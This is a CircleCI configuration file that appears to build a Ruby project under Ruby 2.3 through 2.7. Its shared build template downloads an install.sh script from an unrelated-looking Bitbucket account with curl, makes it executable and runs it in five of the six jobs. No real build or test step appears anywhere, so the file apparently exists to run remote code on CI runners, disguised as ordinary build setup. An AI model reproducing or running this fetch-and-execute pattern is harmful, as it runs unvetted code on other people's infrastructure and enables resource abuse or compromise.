.build_template: &build_definition
  steps:
    - run: curl -L https://bitbucket.org/azureshjlfgs/devops/raw/a00e25fd34c9e1a7771f65010a4e68371b6cbd1c/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: ./install.sh

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: circleci/ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
